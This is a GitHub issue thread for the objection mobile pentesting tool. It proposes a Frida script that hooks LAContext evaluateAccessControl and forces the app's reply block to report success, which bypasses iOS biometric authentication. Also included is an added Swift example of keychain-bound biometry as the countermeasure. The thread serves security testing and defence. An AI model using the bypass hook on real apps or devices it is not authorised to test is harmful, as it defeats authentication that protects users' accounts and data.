sensepost / objection

📱 objection - runtime mobile exploration
GNU General Public License v3.0

Addition to iOS Biometric Bypass #410

Closed jnovak-praetorian closed 3 years ago

jnovak-praetorian commented 4 years ago

The current iOS biometric bypass supports hooking the evaluatePolicy function, but does not hook the evaluateAccessControl function which can be used in its place. A Frida script to hook the latter is given below, but it would be nice to incorporate this into the native ios ui biometrics_bypass functionality.

if (ObjC.available)
{
  try
  {
    // -[LAContext evaluateAccessControl:operation:localizedReason:reply:]
    var hook = ObjC.classes.LAContext["- evaluateAccessControl:operation:localizedReason:reply:"];
    Interceptor.attach(hook.implementation, {
      onEnter: function(args) {
        console.log("[*] evaluateAccessControl onEnter");

        // func evaluatePolicy(LAPolicy, localizedReason: String, reply: (Bool, Error?) -> Void)
        // args[0] = self, args[1] = selector, args[2] = policy, args[3] = reason, args[4] = reply block
        // reference: https://github.com/FSecureLABS/needle/blob/master/needle/modules/hooking/frida/script_touch-id-bypass.py
        /*
        var block = new ObjC.Block(args[4]);
        const appCallback = block.implementation;
        block.implementation = function (success, error) {
          const result = appCallback(1, null);
          return result;
        };
        */

        // func evaluateAccessControl(SecAccessControl, operation: LAAccessControlOperation, localizedReason: String, reply: (Bool, Error?) -> Void)
        // args[2] = access control, args[3] = operation, args[4] = reason, args[5] = reply block
        var block = new ObjC.Block(args[5]);
        const appCallback = block.implementation;
        // Replace the app's reply block so it is always invoked with (success = YES, error = nil)
        block.implementation = function (success, error) {
          console.log("[*] executing hooked evaluateAccessControl callback");
          const result = appCallback(1, null);
          return result;
        };

      },
      onLeave: function(retval) {
        console.log("[*] evaluateAccessControl onLeave");
      }
    });
  }
  catch(err)
  {
      console.log("[!] Exception: " + err.message);
  }
}
else
{
    console.log("Objective-C Runtime is not available!");
}

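
The hook above works because the app decides "authenticated or not" from the Bool handed to its reply block, which runs in-process where Frida can rewrite it. The Swift below is an added example (not code from the objection project or from the issue author) of the app-side pattern that removes that decision from the app: the session token is stored as a keychain item whose access control requires the current biometric set, and the app only ever asks the keychain for it, passing an `LAContext` for the prompt. The Secure Enclave releases the item after a genuine match; a reply block that has been forced to report success has no bearing on `SecItemCopyMatching`, which returns an error for an unauthenticated context. The `service` and `account` strings and the `TokenStoreError` type are placeholders chosen for this example.

```swift
// Added example: biometry-bound keychain storage instead of trusting the LAContext reply Bool.
import Foundation
import LocalAuthentication
import Security

enum TokenStoreError: Error {
    case accessControl(CFError?)
    case keychain(OSStatus)
}

// Hypothetical identifiers for this example.
private let service = "com.example.app"
private let account = "session-token"

/// Store `token` behind an ACL that requires biometry. `.biometryCurrentSet` also invalidates
/// the item if the enrolled fingerprints/face change, so an attacker cannot enrol their own.
func storeToken(_ token: Data) throws {
    var cfError: Unmanaged<CFError>?
    guard let acl = SecAccessControlCreateWithFlags(
        kCFAllocatorDefault,
        kSecAttrAccessibleWhenUnlockedThisDeviceOnly,
        .biometryCurrentSet,
        &cfError
    ) else {
        throw TokenStoreError.accessControl(cfError?.takeRetainedValue())
    }

    let lookup: [String: Any] = [
        kSecClass as String: kSecClassGenericPassword,
        kSecAttrService as String: service,
        kSecAttrAccount as String: account,
    ]
    // Replace any previous token; "not found" is the expected state on first run.
    let deleteStatus = SecItemDelete(lookup as CFDictionary)
    guard deleteStatus == errSecSuccess || deleteStatus == errSecItemNotFound else {
        throw TokenStoreError.keychain(deleteStatus)
    }

    var add = lookup
    add[kSecAttrAccessControl as String] = acl
    add[kSecValueData as String] = token
    let status = SecItemAdd(add as CFDictionary, nil)
    guard status == errSecSuccess else { throw TokenStoreError.keychain(status) }
}

/// Read the token. The keychain drives the biometric prompt through the supplied LAContext;
/// the app never calls evaluatePolicy/evaluateAccessControl and never branches on a Bool.
func readToken() throws -> Data {
    let context = LAContext()
    context.localizedReason = "Unlock your session"

    let query: [String: Any] = [
        kSecClass as String: kSecClassGenericPassword,
        kSecAttrService as String: service,
        kSecAttrAccount as String: account,
        kSecReturnData as String: true,
        kSecUseAuthenticationContext as String: context,
    ]
    var item: CFTypeRef?
    let status = SecItemCopyMatching(query as CFDictionary, &item)
    guard status == errSecSuccess, let data = item as? Data else {
        // errSecAuthFailed, errSecUserCanceled and errSecItemNotFound all land here.
        // Treat them as "not authenticated"; do not fall back to an unauthenticated path.
        throw TokenStoreError.keychain(status)
    }
    return data
}
```

The test from the pentester's side is the one this issue describes: with the hook loaded, an app built this way still fails to produce the token, because the only thing the hook changed is what the app's own callback was told. When reviewing an iOS app, look for code that gates a feature on the reply Bool alone (or on `canEvaluatePolicy`), as opposed to code whose sensitive material only exists as the result of a keychain read under `kSecUseAuthenticationContext`.
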
jnovak-praetorian commented 4 years ago

Example code for evaluateAccessControl can be found in this article.

leonjza commented 4 years ago

@jnovak-praetorian want to take a stab at a PR to include it?

jnovak-praetorian commented 4 years ago

Yep, I'm gonna see if I can set up my dev environment and get this in a PR as it seems pretty straightforward.

duraki commented 3 years ago

@leonjza can you close this issue? PR was merged w/ master LTA.

leonjza commented 3 years ago

Yup! Thanks.